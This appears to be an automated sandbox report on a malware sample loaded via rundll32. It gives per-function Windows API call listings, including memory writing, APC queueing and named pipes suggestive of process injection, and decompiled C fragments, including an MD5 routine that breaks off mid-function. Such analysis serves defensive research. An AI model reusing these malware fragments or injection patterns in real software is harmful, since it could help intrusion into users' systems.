                                          Similarity
                                          • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                                          • String ID:
                                          • API String ID: 499515686-0
                                          • Opcode ID: c6c727d19fe4a9d2d722927994e059ddc54b5bcdbbde75c15f51a8d63fe54e05
                                          • Instruction ID: 7d0285d8d5bf3ca586d652270791da9508750afa92e664bf2cf095d323eff8f9
                                          • Opcode Fuzzy Hash: c6c727d19fe4a9d2d722927994e059ddc54b5bcdbbde75c15f51a8d63fe54e05
                                          • Instruction Fuzzy Hash: A441387180020AEFDF11AFA4DC45BAEBBF9EF04306F2044F5E915A71A5DB718A98DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • LoadLibraryA.KERNEL32(?,00000000,?,00000014,?,00B54E94), ref: 00B5A533
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B5A552
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B5A567
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B5A57D
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B5A593
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B5A5A9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$AllocateHeapLibraryLoad
                                          • String ID:
                                          • API String ID: 2486251641-0
                                          • Opcode ID: a8bf63c9c13f77a12853fb9cae0ae2c13fd4f191d6c70fc7afdfc90faba92fab
                                          • Instruction ID: d6e66ff37d5349fb071deafbba2def189959dc6208f421ec6a91b41b3f6a4385
                                          • Opcode Fuzzy Hash: a8bf63c9c13f77a12853fb9cae0ae2c13fd4f191d6c70fc7afdfc90faba92fab
                                          • Instruction Fuzzy Hash: BB11337120060FAFDB209B69EC84E66B7ECEF1430234645E6EA4AD7351EB30DD448F60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.NTDLL ref: 00B57A40
                                            • Part of subcall function 00B6AD9E: NtAllocateVirtualMemory.NTDLL(00B57A68,00000000,00000000,00B57A68,00003000,00000040), ref: 00B6ADCF
                                            • Part of subcall function 00B6AD9E: RtlNtStatusToDosError.NTDLL(00000000), ref: 00B6ADD6
                                            • Part of subcall function 00B6AD9E: SetLastError.KERNEL32(00000000), ref: 00B6ADDD
                                          • GetLastError.KERNEL32(?,00000318,00000008), ref: 00B57B50
                                            • Part of subcall function 00B529B2: RtlNtStatusToDosError.NTDLL(00000000), ref: 00B529CA
                                          • memcpy.NTDLL(00000218,00B732B0,00000100,?,00010003,00001003,?,00000318,00000008), ref: 00B57ACF
                                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 00B57B29
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
                                          • String ID:
                                          • API String ID: 2966525677-3916222277
                                          • Opcode ID: d71670f4f0d47e6b8ee5162f8976482ae545be047ce9f37f04df5584ba0101a5
                                          • Instruction ID: 7f0b44e4e46af0668d9f5f1e00cfec7f70a7c8444c18b1b56a0edef31d20ffe1
                                          • Opcode Fuzzy Hash: d71670f4f0d47e6b8ee5162f8976482ae545be047ce9f37f04df5584ba0101a5
                                          • Instruction Fuzzy Hash: 4F319371A41209AFDB20DF64D898BAAB7F8FB14305F1045EAE959E7250EB309E488B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memset$memcpy
                                          • String ID:
                                          • API String ID: 368790112-0
                                          • Opcode ID: 6fe05e4cc781211d64a70dbaf47a410b9843d59e9dbf4bb8f47ec014ac7f0c43
                                          • Instruction ID: 59c6038b5fd0836440428241347fe351c254ca55c4554ee86849d3dac073891b
                                          • Opcode Fuzzy Hash: 6fe05e4cc781211d64a70dbaf47a410b9843d59e9dbf4bb8f47ec014ac7f0c43
                                          • Instruction Fuzzy Hash: A5F1CF30500B99DFCB31CF69C5847AABBF4FF51302F2449EDC9E696681D632AA49CB14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0489515F(intOrPtr _a4) {
                                          				void* _t2;
                                          				unsigned int _t4;
                                          				void* _t5;
                                          				long _t6;
                                          				void* _t7;
                                          				void* _t15;
                                          
                                          				_t2 = CreateEventA(0, 1, 0, 0);
                                          				 *0x489a30c = _t2;
                                          				if(_t2 == 0) {
                                          					return GetLastError();
                                          				}
                                          				_t4 = GetVersion();
                                          				if(_t4 != 5) {
                                          					L4:
                                          					if(_t15 <= 0) {
                                          						_t5 = 0x32;
                                          						return _t5;
                                          					}
                                          					L5:
                                          					 *0x489a2fc = _t4;
                                          					_t6 = GetCurrentProcessId();
                                          					 *0x489a2f8 = _t6;
                                          					 *0x489a304 = _a4;
                                          					_t7 = OpenProcess(0x10047a, 0, _t6);
                                          					 *0x489a2f4 = _t7;
                                          					if(_t7 == 0) {
                                          						 *0x489a2f4 =  *0x489a2f4 | 0xffffffff;
                                          					}
                                          					return 0;
                                          				}
                                          				if(_t4 >> 8 > 0) {
                                          					goto L5;
                                          				}
                                          				_t15 = _t4 - _t4;
                                          				goto L4;
                                          			}

                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04893D54,?), ref: 04895167
                                          • GetVersion.KERNEL32 ref: 04895176
                                          • GetCurrentProcessId.KERNEL32 ref: 04895192
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 048951AF
                                          • GetLastError.KERNEL32 ref: 048951CE
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                          • String ID:
                                          • API String ID: 2270775618-0
                                          • Opcode ID: 29702e69294bccf96b6fcc3e6a5e105e9212a6900795bca329914edde1be0e1b
                                          • Instruction ID: 8b9ae80f29458d175045d991300c3aad852c56d4522651466f79dbf7acdc9781
                                          • Opcode Fuzzy Hash: 29702e69294bccf96b6fcc3e6a5e105e9212a6900795bca329914edde1be0e1b
                                          • Instruction Fuzzy Hash: EAF081B1640F02BBDF295F65AC19B143BA0E744745F1C4E19E522CA2C4EFB9AC40CB19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 00B651DE
                                          • lstrlenW.KERNEL32(?), ref: 00B651EC
                                          • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 00B65217
                                          • lstrcpyW.KERNEL32(00000006,00000000), ref: 00B65245
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Query$lstrcpylstrlen
                                          • String ID:
                                          • API String ID: 3961825720-0
                                          • Opcode ID: cd8d208941127b69a19df9f9bede38017b5a9005bcbba00f8cfd6001b41bb878
                                          • Instruction ID: f916edde627179eeb826b08bcdf2983611c8822368f7b9a4591b7812877379be
                                          • Opcode Fuzzy Hash: cd8d208941127b69a19df9f9bede38017b5a9005bcbba00f8cfd6001b41bb878
                                          • Instruction Fuzzy Hash: F4411871500609FFDB219FA8CC85AAEBBB9EF04314F1040A9F909A7260DB75EE61DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,00B79208,00000001), ref: 00B54E19
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B54E64
                                            • Part of subcall function 00B66B34: CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00B5A82F), ref: 00B66B4B
                                            • Part of subcall function 00B66B34: QueueUserAPC.KERNEL32(00000000,00000000,?,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B66B60
                                            • Part of subcall function 00B66B34: GetLastError.KERNEL32(00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B66B6B
                                            • Part of subcall function 00B66B34: TerminateThread.KERNEL32(00000000,00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B66B75
                                            • Part of subcall function 00B66B34: CloseHandle.KERNEL32(00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B66B7C
                                            • Part of subcall function 00B66B34: SetLastError.KERNEL32(00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B66B85
                                          • GetLastError.KERNEL32(00B5C7AE,00000000,00000000,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B54E4C
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B54E5C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                                          • String ID:
                                          • API String ID: 1700061692-0
                                          • Opcode ID: 4bde763aa86a75edbfa088a9f7c510ccceeda35e246ba56d27281a7f6b9ebfcc
                                          • Instruction ID: 0f7df36b7799693ca6d85e53d4c9135d438a4761ce563e18c6c249bb6be62823
                                          • Opcode Fuzzy Hash: 4bde763aa86a75edbfa088a9f7c510ccceeda35e246ba56d27281a7f6b9ebfcc
                                          • Instruction Fuzzy Hash: C3F0A471341351BFE3145BA8AC89F6677A8EB85336F1101B4FA2AD32E0CB600C9A8674
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 00B6265F
                                          • GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 00B6269F
                                            • Part of subcall function 00B6B628: NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,00001003,00B57B0A,00000000,?,00B57B0A,00001003,00000000,00000000,00000318,00000020,?,00010003,00001003), ref: 00B6B646
                                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 00B626A8
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Error$InformationLastMemoryQueryStatusThreadVirtualWrite
                                          • String ID:
                                          • API String ID: 4036914670-0
                                          • Opcode ID: 9d8f7122d5744e2132ef62b10552a0365f76d6e4d215231ece1cb1dcaac1ea9d
                                          • Instruction ID: b2bfcb8501612d1efbc6bc5646e15fc59dab65a9719168587b32c0b7e844260a
                                          • Opcode Fuzzy Hash: 9d8f7122d5744e2132ef62b10552a0365f76d6e4d215231ece1cb1dcaac1ea9d
                                          • Instruction Fuzzy Hash: CD016D36A00108FFFB10ABA5DD05DEEBBFEEB84701F100065FA01E2061EB39D9549B20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 00B51BC3
                                          • RtlNtStatusToDosError.NTDLL(C000009A), ref: 00B51BFA
                                            • Part of subcall function 00B5C6B8: RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorFreeHeapInformationQueryStatusSystem
                                          • String ID:
                                          • API String ID: 2533303245-0
                                          • Opcode ID: 663c25cdf7784784b827befbcc2442c8e018be2f2ef5c62d327338c77dc7e26c
                                          • Instruction ID: ffa01627ab612a70994222a807994427c010decc4eea52a517b1d479fc143cb8
                                          • Opcode Fuzzy Hash: 663c25cdf7784784b827befbcc2442c8e018be2f2ef5c62d327338c77dc7e26c
                                          • Instruction Fuzzy Hash: B501D132902124ABD7219B9D8D08FAFBAE9DF85B53F1608D4FD05A7100FB358E4896E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.NTDLL ref: 00B5A0A4
                                          • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 00B5A0BC
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InformationProcessQuerymemset
                                          • String ID:
                                          • API String ID: 2040988606-0
                                          • Opcode ID: 09ba2f2805815cf85d77ec20492186ff5419bd7eb5d7eedeb9962c8d45ceeaea
                                          • Instruction ID: 91e2f3e711a8805f2a4d0ffac65cebdd632f520223e1f47618e0e300131e593c
                                          • Opcode Fuzzy Hash: 09ba2f2805815cf85d77ec20492186ff5419bd7eb5d7eedeb9962c8d45ceeaea
                                          • Instruction Fuzzy Hash: FCF044769002186ADB10DA91CC45FDE7BACDB04740F0480A0BE08E6191D774DB598BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlNtStatusToDosError.NTDLL(C0000002), ref: 00B6C1EF
                                          • SetLastError.KERNEL32(00000000,?,00B528F4,?,?,?,00000040,?), ref: 00B6C1F6
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Error$LastStatus
                                          • String ID:
                                          • API String ID: 4076355890-0
                                          • Opcode ID: 07b88243fde26b7c127a5ea24ee32e36843b727d0304d0062b5e33eea8e3cad6
                                          • Instruction ID: ac4b8bb9d8124f860192b84753e2aa8ae4b62aeb7d642ec65e8873ab3808c9d3
                                          • Opcode Fuzzy Hash: 07b88243fde26b7c127a5ea24ee32e36843b727d0304d0062b5e33eea8e3cad6
                                          • Instruction Fuzzy Hash: 21E09A3620021AABCF115FE9AC08D9A7FA9EB1D751B004421BE59E3131DB35D9A1ABE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.NTDLL ref: 00B6C783
                                          • memset.NTDLL ref: 00B6C792
                                            • Part of subcall function 00B618FC: memset.NTDLL ref: 00B6190D
                                            • Part of subcall function 00B618FC: memset.NTDLL ref: 00B61919
                                            • Part of subcall function 00B618FC: memset.NTDLL ref: 00B61944
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memset
                                          • String ID:
                                          • API String ID: 2221118986-0
                                          • Opcode ID: 4270f02eb92defb9d83c35f2a1f3120725169ebc5706e52a5930cd2b77a8110b
                                          • Instruction ID: 677ccda9d6a63e718cf0634be936bad48e7cc14c935dfed78920d4b73bd15bc4
                                          • Opcode Fuzzy Hash: 4270f02eb92defb9d83c35f2a1f3120725169ebc5706e52a5930cd2b77a8110b
                                          • Instruction Fuzzy Hash: 68020E71501B618FCB79CF29C690526BBF1BF647107609EAEC6E786A90D639F881CF04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 49%
                                          			E0489198A(void* __ecx, intOrPtr* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				intOrPtr _v36;
                                          				intOrPtr _v40;
                                          				intOrPtr _v44;
                                          				intOrPtr _v48;
                                          				intOrPtr _v52;
                                          				intOrPtr _v56;
                                          				intOrPtr _v60;
                                          				intOrPtr _v64;
                                          				intOrPtr _v68;
                                          				intOrPtr _v72;
                                          				void _v76;
                                          				intOrPtr* _t226;
                                          				signed int _t229;
                                          				signed int _t231;
                                          				signed int _t233;
                                          				signed int _t235;
                                          				signed int _t237;
                                          				signed int _t239;
                                          				signed int _t241;
                                          				signed int _t243;
                                          				signed int _t245;
                                          				signed int _t247;
                                          				signed int _t249;
                                          				signed int _t251;
                                          				signed int _t253;
                                          				signed int _t255;
                                          				signed int _t257;
                                          				signed int _t259;
                                          				signed int _t338;
                                          				signed char* _t348;
                                          				signed int _t349;
                                          				signed int _t351;
                                          				signed int _t353;
                                          				signed int _t355;
                                          				signed int _t357;
                                          				signed int _t359;
                                          				signed int _t361;
                                          				signed int _t363;
                                          				signed int _t365;
                                          				signed int _t367;
                                          				signed int _t376;
                                          				signed int _t378;
                                          				signed int _t380;
                                          				signed int _t382;
                                          				signed int _t384;
                                          				intOrPtr* _t400;
                                          				signed int* _t401;
                                          				signed int _t402;
                                          				signed int _t404;
                                          				signed int _t406;
                                          				signed int _t408;
                                          				signed int _t410;
                                          				signed int _t412;
                                          				signed int _t414;
                                          				signed int _t416;
                                          				signed int _t418;
                                          				signed int _t420;
                                          				signed int _t422;
                                          				signed int _t424;
                                          				signed int _t432;
                                          				signed int _t434;
                                          				signed int _t436;
                                          				signed int _t438;
                                          				signed int _t440;
                                          				signed int _t508;
                                          				signed int _t599;
                                          				signed int _t607;
                                          				signed int _t613;
                                          				signed int _t679;
                                          				void* _t682;
                                          				signed int _t683;
                                          				signed int _t685;
                                          				signed int _t690;
                                          				signed int _t692;
                                          				signed int _t697;
                                          				signed int _t699;
                                          				signed int _t718;
                                          				signed int _t720;
                                          				signed int _t722;
                                          				signed int _t724;
                                          				signed int _t726;
                                          				signed int _t728;
                                          				signed int _t734;
                                          				signed int _t740;
                                          				signed int _t742;
                                          				signed int _t744;
                                          				signed int _t746;
                                          				signed int _t748;
                                          
				/* Decompiled MD5 block transform: the loop below unpacks the 64-byte input block
				   (at __ecx) into sixteen little-endian 32-bit words (_v76.._v16); the four rounds
				   that follow use the MD5 round functions F, G, H, I with the standard T constants
				   (e.g. -0x28955b88 == 0xd76aa478) and rotations 7/12/17/22, 5/9/14/20, 4/11/16/23,
				   6/10/15/21; the result is added to the 4-word state at _a4 and the word buffer is
				   cleared with memset. */
				_t226 = _a4;
                                          				_t348 = __ecx + 2;
                                          				_t401 =  &_v76;
                                          				_t682 = 0x10;
                                          				do {
                                          					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                                          					_t401 =  &(_t401[1]);
                                          					_t348 =  &(_t348[4]);
                                          					_t682 = _t682 - 1;
                                          				} while (_t682 != 0);
                                          				_t6 = _t226 + 4; // 0x14eb3fc3
                                          				_t683 =  *_t6;
                                          				_t7 = _t226 + 8; // 0x8d08458b
                                          				_t402 =  *_t7;
                                          				_t8 = _t226 + 0xc; // 0x56c1184c
                                          				_t349 =  *_t8;
                                          				asm("rol eax, 0x7");
                                          				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                                          				asm("rol ecx, 0xc");
                                          				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                                          				asm("ror edx, 0xf");
                                          				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                                          				asm("ror esi, 0xa");
                                          				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                                          				_v8 = _t685;
                                          				_t690 = _v8;
                                          				asm("rol eax, 0x7");
                                          				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                                          				asm("rol ecx, 0xc");
                                          				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                                          				asm("ror edx, 0xf");
                                          				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                                          				asm("ror esi, 0xa");
                                          				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                                          				_v8 = _t692;
                                          				_t697 = _v8;
                                          				asm("rol eax, 0x7");
                                          				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                                          				asm("rol ecx, 0xc");
                                          				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                                          				asm("ror edx, 0xf");
                                          				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                                          				asm("ror esi, 0xa");
                                          				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                                          				_v8 = _t699;
                                          				asm("rol eax, 0x7");
                                          				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                          				asm("rol ecx, 0xc");
                                          				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                                          				_t508 =  !_t357;
                                          				asm("ror edx, 0xf");
                                          				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                                          				_v12 = _t410;
                                          				_v12 =  !_v12;
                                          				asm("ror esi, 0xa");
                                          				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                                          				asm("rol eax, 0x5");
                                          				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                                          				asm("rol ecx, 0x9");
                                          				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                                          				asm("rol edx, 0xe");
                                          				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                                          				asm("ror esi, 0xc");
                                          				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                                          				asm("rol eax, 0x5");
                                          				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                                          				asm("rol ecx, 0x9");
                                          				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                                          				asm("rol edx, 0xe");
                                          				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                                          				asm("ror esi, 0xc");
                                          				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                                          				asm("rol eax, 0x5");
                                          				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                                          				asm("rol ecx, 0x9");
                                          				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                                          				asm("rol edx, 0xe");
                                          				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                                          				asm("ror esi, 0xc");
                                          				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                                          				asm("rol eax, 0x5");
                                          				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                                          				asm("rol ecx, 0x9");
                                          				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                                          				asm("rol edx, 0xe");
                                          				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                                          				asm("ror esi, 0xc");
                                          				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                                          				asm("rol eax, 0x4");
                                          				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                                          				asm("rol ecx, 0xb");
                                          				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                                          				asm("rol edx, 0x10");
                                          				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                                          				_t599 = _t367 ^ _t420;
                                          				asm("ror esi, 0x9");
                                          				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                                          				asm("rol eax, 0x4");
                                          				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                                          				asm("rol edi, 0xb");
                                          				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                                          				asm("rol edx, 0x10");
                                          				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                                          				_t338 = _t607 ^ _t422;
                                          				asm("ror ecx, 0x9");
                                          				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                                          				asm("rol eax, 0x4");
                                          				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                                          				asm("rol esi, 0xb");
                                          				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                                          				asm("rol edi, 0x10");
                                          				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                                          				_t424 = _t734 ^ _t613;
                                          				asm("ror ecx, 0x9");
                                          				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                                          				asm("rol eax, 0x4");
                                          				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                                          				asm("rol edx, 0xb");
                                          				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                                          				asm("rol esi, 0x10");
                                          				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                                          				asm("ror ecx, 0x9");
                                          				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                                          				asm("rol eax, 0x6");
                                          				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                                          				asm("rol edx, 0xa");
                                          				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                                          				asm("rol esi, 0xf");
                                          				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                                          				asm("ror ecx, 0xb");
                                          				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                                          				asm("rol eax, 0x6");
                                          				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                                          				asm("rol edx, 0xa");
                                          				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                                          				asm("rol esi, 0xf");
                                          				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                                          				asm("ror ecx, 0xb");
                                          				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                                          				asm("rol eax, 0x6");
                                          				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                                          				asm("rol edx, 0xa");
                                          				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                                          				asm("rol esi, 0xf");
